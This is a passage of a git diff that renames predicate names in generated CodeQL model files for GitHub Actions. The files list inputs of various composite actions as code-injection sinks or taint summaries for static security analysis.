-1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fastly/compute-actions", "*", "input.fastly-api-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml index 6f8ef16ea330..2bd521d42f58 100644 --- a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml +++ b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["felangel/bloc", "*", "input.coverage_excludes", "code-injection", "generated"] - ["felangel/bloc", "*", "input.analyze_directories", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml index bc2146921efe..8ae81e706a42 100644 --- a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["firebase/firebase-ios-sdk", "*", "input.min-ios-version", "code-injection", "generated"] - ["firebase/firebase-ios-sdk", "*", "input.sources", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml index 37e1d0d67a5e..4893772b71ae 100644 --- a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml +++ b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["flagsmith/flagsmith", "*", "input.aws_ecr_repository_arn", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml index eabd3834b1b7..e174c830a855 100644 --- a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml +++ b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flaxengine/flaxengine", "*", "input.vulkan-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml index 2253e33b950c..14070215bfa3 100644 --- a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-version", "code-injection", "generated"] - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml index bc1eb54056af..f3a0b47f2c2c 100644 --- a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml +++ b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fluxcd/flux2", "*", "input.bindir", "code-injection", "generated"] - ["fluxcd/flux2", "*", "input.token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml index 842240cfaa20..12011d643963 100644 --- a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml +++ b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["forcedotcom/salesforcedx-vscode", "*", "input.email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml index 8ff5ee1e2c0a..40ecb17610eb 100644 --- a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml +++ b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fossasia/visdom", "*", "input.loadprbuild", "code-injection", "generated"] - ["fossasia/visdom", "*", "input.usebasebranch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml index 29c5f793fb24..250606588f98 100644 --- a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["freckle/stack-action", "*", "input.find-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml index 2f12293df0ed..f2f5678b8b8a 100644 --- a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["freeradius/freeradius-server", "*", "input.gcc_ver", "code-injection", "generated"] - ["freeradius/freeradius-server", "*", "input.llvm_ver", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml index 83012e513359..b17eb01f8217 100644 --- a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml +++ b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gaphor/gaphor", "*", "input.version", "code-injection", "generated"] - ["gaphor/gaphor", "*", "input.base64_encoded_pfx", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml index 8ca211961948..7ebdde766f3d 100644 --- a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml +++ b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getsentry/action-release", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml index 7f19fd1f6a6f..7f2e1588139e 100644 --- a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["github/codeql-action", "*", "input.latest_tag", "code-injection", "generated"] - ["github/codeql-action", "*", "input.major_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml index 1889fcff1441..eedeb3844223 100644 --- a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["github/ruby", "*", "input.builddir", "code-injection", "generated"] - ["github/ruby", "*", "input.srcdir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml index f8243352f455..fb6fb0267bb9 100644 --- a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gittools/gitversion", "*", "input.distro", "code-injection", "generated"] - ["gittools/gitversion", "*", "input.targetFramework", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml index bd2015a70964..60df7484e7f3 100644 --- a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml +++ b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["go-spatial/tegola", "*", "input.artifact_name", "code-injection", "generated"] - ["go-spatial/tegola", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml index 501123a82fe5..d0af7b61f989 100644 --- a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml +++ b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["goauthentik/authentik", "*", "input.postgresql_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml index 1a17e3db2b8c..8d08848d24c4 100644 --- a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml +++ b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["godotengine/godot", "*", "input.bin", "code-injection", "generated"] - ["godotengine/godot", "*", "input.tests", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml index a125a4bfa8c6..f26f672a586c 100644 --- a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml +++ b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["google/dagger", "*", "input.agp", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml index e8d0cc64792b..5431aad8dca6 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googleapis/java-cloud-bom", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml index 736c84b68ccf..92c23f9f1fbd 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googleapis/sdk-platform-java", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml index 062203945c50..52654194d81e 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["googlecloudplatform/magic-modules", "*", "output.changed-files", "filename", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml index aedeb4e1023c..43c274aa0337 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml index 0d8afb086c94..7f8b87fa20ef 100644 --- a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gravitational/teleport", "*", "input.target", "code-injection", "generated"] - ["gravitational/teleport", "*", "input.attempts", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml index 4756acbf306f..31422a708c5a 100644 --- a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml +++ b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["grote/transportr", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml index a0e4acec75a0..30ccfdea6318 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/nomad", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml index 6acfcf9773f5..9bc22ac93ef0 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/terraform", "*", "input.target-terraform-branch", "code-injection", "generated"] - ["hashicorp/terraform", "*", "input.target-terraform-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml index 7e0deeea9065..4ec47cb39750 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml @@ -1,13 +1,13 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/vault", "*", "input.destination", "code-injection", "generated"] - ["hashicorp/vault", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hashicorp/vault", "*", "input.vault-version", "output.vault-version", "taint", "manual"] - ["hashicorp/vault", "*", "input.vault-binary-path", "output.vault-binary-path", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml index 18678fe9ecd2..81d137ce5478 100644 --- a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["home-assistant/android", "*", "input.lokalise-token", "code-injection", "generated"] - ["home-assistant/android", "*", "input.lokalise-project", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml index d9d492f79cd5..79675d59c056 100644 --- a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["homebrew/actions", "*", "input.casks", "code-injection", "generated"] - ["homebrew/actions", "*", "input.formulae", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml index d3046ff1fc40..3310a67347cd 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hyperledger/aries-cloudagent-python", "*", "input.TEST_SCOPE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml index 845fba40a6cf..d12963b43db2 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hyperledger/fabric-samples", "*", "input.ca-version", "code-injection", "generated"] - ["hyperledger/fabric-samples", "*", "input.fabric-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml index bcf51805710b..1c63a9e6d0f7 100644 --- a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml +++ b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["igniterealtime/openfire", "*", "input.domain", "code-injection", "generated"] - ["igniterealtime/openfire", "*", "input.ip", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml index e1ff1fa3497c..e120de812c40 100644 --- a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["infracost/actions", "*", "input.behavior", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml index 4c5ef712e587..1be37285c9ef 100644 --- a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml +++ b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["inspektor-gadget/inspektor-gadget", "*", "input.runtime", "code-injection", "generated"] - ["inspektor-gadget/inspektor-gadget", "*", "input.registry", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml index 31e1f562877e..aa6e9b684d08 100644 --- a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml +++ b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["intel-analytics/ipex-llm", "*", "input.extra-dependency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml index 298ba1ccbe3b..221aa83de0b0 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ionic-team/ionic-framework", "*", "input.totalShards", "code-injection", "generated"] - ["ionic-team/ionic-framework", "*", "input.shard", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml index 0dc57625890c..710079324272 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ionic-team/ionicons", "*", "input.paths", "code-injection", "generated"] - ["ionic-team/ionicons", "*", "input.output", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml index c6fc16750f8b..bff13b29ecc1 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ionic-team/stencil", "*", "input.paths", "code-injection", "generated"] - ["ionic-team/stencil", "*", "input.output", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml index 0cbbd38d4280..1f75dd81c046 100644 --- a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml +++ b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ipfs/aegir", "*", "input.browser", "code-injection", "generated"] - ["ipfs/aegir", "*", "input.docker-username", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml index acc6cb91c076..15604c34a17a 100644 --- a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml +++ b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jetbrains/jetbrainsruntime", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml index c59e989db046..aef7f4f6242c 100644 --- a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml +++ b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jhipster/generator-jhipster", "*", "input.generator-path", "code-injection", "generated"] - ["jhipster/generator-jhipster", "*", "input.application-packaging", "code-injection", "generated"] @@ -22,6 +22,6 @@ extensions: - ["jhipster/generator-jhipster", "*", "input.extra-args", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["jhipster/generator-jhipster", "*", "input.skip-workflow", "output.skip-workflow", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml index b426dfb250da..f3a26e867ec6 100644 --- a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml +++ b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jsocol/django-ratelimit", "*", "input.django-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml index 4a0c3c2d30f5..4feab5714c79 100644 --- a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["juicedata/juicefs", "*", "input.compress", "code-injection", "generated"] - ["juicedata/juicefs", "*", "input.storage", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml index 74d0ef69f753..3030f81072a0 100644 --- a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jupyter/docker-stacks", "*", "input.variant", "code-injection", "generated"] - ["jupyter/docker-stacks", "*", "input.image", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml index ac8762d24eab..7f8885d1ec78 100644 --- a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml +++ b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["keycloak/keycloak", "*", "input.job-name", "code-injection", "generated"] - ["keycloak/keycloak", "*", "input.jobs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml index 6df9a160ec5d..93e6b1e03122 100644 --- a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml +++ b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kserve/kserve", "*", "input.directory", "code-injection", "generated"] - ["kserve/kserve", "*", "input.deployment-mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml index 0c2793028a0a..5284159e9db5 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubeflow/katib", "*", "input.experiments", "code-injection", "generated"] - ["kubeflow/katib", "*", "input.database-type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml index 